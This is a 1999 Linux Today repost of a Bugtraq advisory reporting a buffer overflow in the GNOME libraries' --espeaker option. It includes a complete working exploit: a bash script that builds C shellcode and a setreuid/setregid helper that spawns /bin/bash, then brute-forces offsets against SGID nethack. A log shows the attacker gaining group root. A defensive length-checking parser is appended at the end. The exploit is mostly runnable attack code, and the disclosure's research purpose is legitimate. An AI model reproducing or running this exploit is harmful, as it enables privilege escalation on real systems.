Linux GNOME exploit | Linux Today

Written by Web Webster
Sep 28, 1999

Update: Chmouel Boudjnah of MandrakeSoft says:

Humm, it’s not a RedHat bug but a Mandrake one.

The fixed package is available from our updates mirror, see:

http://www.linux-mandrake.com/en/fupdates.php3

or launch MandrakeUpdate.

Note: the security issue is only with the 6.0 version; since 6.1 the
package has been removed.

We advise removing the package completely from your system if
you are a security maniac (and who isn’t?).

    From: Brock Tellier 
 Subject: Linux GNOME exploit
    Date: Thu, 23 Sep 1999 18:36:18 -0500
      To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

Virtually any program using the GNOME libraries is vulnerable to
a buffer overflow attack. The attack comes in the form:

/path/to/gnome/prog --enable-sound --espeaker=$80bytebuffer

The following exploit should work against any GNOME program,
though I tried it on (the irony) /usr/games/nethack, which is SGID
root by default on RH6.0. An attack on any program will look
something like this:

[xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id
Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686
unknown
Linux Mandrake release 6.0 (Venus)
uid=501(xnec) gid=501(xnec) groups=501(xnec)
[xnec@redhack gnox]$ ./gnox.sh
Building /tmp/gnox.c…
…done!
Building /tmp/gn.c…
…done!
Compiling /tmp/gnox…
…done!
Compiling /tmp/gn…
…done!
Launching attack…

… pages and pages of segfaults

Generic GNOME exploit for Linux x86
Brock Tellier btellier@webley.com

Using addr: 0xbffff988  buflen:90  offset:208
Can't resolve host name "[unprintable shellcode bytes]"

before: uid=501, euid=501, gid=501, egid=0
after: uid=501, euid=501, gid=0, egid=0
[xnec@redhack gnomehack]$ id
uid=501(xnec) gid=0(root) groups=501(xnec)

Brock Tellier
UNIX Systems Administrator
Webley Systems
http://www.webley.com

--- gnox.sh ---
#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so.  Hence the shell script.
#
# This should work against any su/gid GNOME program.  The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<EOF
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFSIZ at 90 and only modify your offset
 *
 */


#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char gnoshell[]= /* Generic Linux x86 shellcode modified to run our program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";

#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

/* Return the current stack pointer (x86 only, relies on eax being the return register) */
unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}

int main(int argc, char *argv[]) {

int offset, i;
int buflen = BUFLEN;
long int addr;
char buf[BUFLEN];
char gnobuf[LEN];
if(argc > 2) {
  fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
  exit(0);
}
 else if (argc == 2){
   offset=atoi(argv[1]);
 }
 else {
   offset=DEFAULT_OFFSET;
 }


addr=get_sp();

fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
fprintf(stderr, "Using addr: 0x%lx  buflen:%d  offset:%d\n", addr-offset,
buflen, offset);

/* NOP sled, then the shellcode at offset 35, then guessed return addresses */
memset(buf,NOP,buflen);
memcpy(buf+35,gnoshell,strlen(gnoshell));
for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
        *(int *)&buf[i]=addr-offset;

/* Emit the argument string the shell script passes to the target program */
sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
for(i=0;i<strlen(gnobuf);i++)
        putchar(gnobuf[i]);

return 0;
}
EOF

echo "...done!"

echo "Building /tmp/gn.c..."

cat > /tmp/gn.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  setreuid(geteuid(), geteuid());
  setregid(getegid(), getegid());

  printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  system("/bin/bash");
  return 0;
}
EOF

echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"

echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."

offset=0

while [ $offset -lt 10000 ]; do
    /usr/games/nethack `/tmp/gnox $offset`
    offset=`expr $offset + 4`
done

echo "...done!"
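As an added example (not part of Brock Tellier's post or of the GNOME libraries' code), here is the defensive counterpart to the bug described above: a handler for a host-name option such as `--espeaker=HOST` that checks the length of the value before copying it into a fixed 80-byte buffer, which is the check whose absence the post exploits. The function names, the accepted character set and the `host:port` value format are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define ESPEAKER_MAX 80   /* same fixed capacity the overflowed buffer had */

/* Copy the value of "--espeaker=VALUE" into host (capacity hostlen).
 * Returns 0 on success, -1 if arg is not an --espeaker option,
 * -2 if the value is empty or does not fit together with its NUL,
 * -3 if it contains characters a host name cannot contain.
 * Illustrative interface (assumption), not the GNOME library's own. */
int parse_espeaker(const char *arg, char *host, size_t hostlen)
{
    static const char prefix[] = "--espeaker=";
    const char *value;
    size_t len, i;

    if (strncmp(arg, prefix, sizeof(prefix) - 1) != 0)
        return -1;
    value = arg + sizeof(prefix) - 1;
    len = strlen(value);
    /* Length check BEFORE any byte is copied: a value of 80 bytes or
     * more would otherwise run past the end of an 80-byte buffer. */
    if (len == 0 || len >= hostlen)
        return -2;
    /* Letters, digits, '-' and '.' for the name, ':' for a port suffix. */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != '-' && c != '.' && c != ':')
            return -3;
    }
    memcpy(host, value, len + 1);   /* len + 1 <= hostlen, NUL included */
    return 0;
}

/* Convenience wrapper: parse into an ESPEAKER_MAX-byte buffer, return rc. */
int espeaker_rc(const char *arg)
{
    char host[ESPEAKER_MAX];
    return parse_espeaker(arg, host, sizeof host);
}

int main(void)
{
    /* A short name passes; a 90-byte value like the one gnox emits is refused. */
    printf("%d %d\n", espeaker_rc("--espeaker=sound.example.org:16001"),
           espeaker_rc("--espeaker=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"));
    return 0;   /* prints "0 -2" */
}
```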
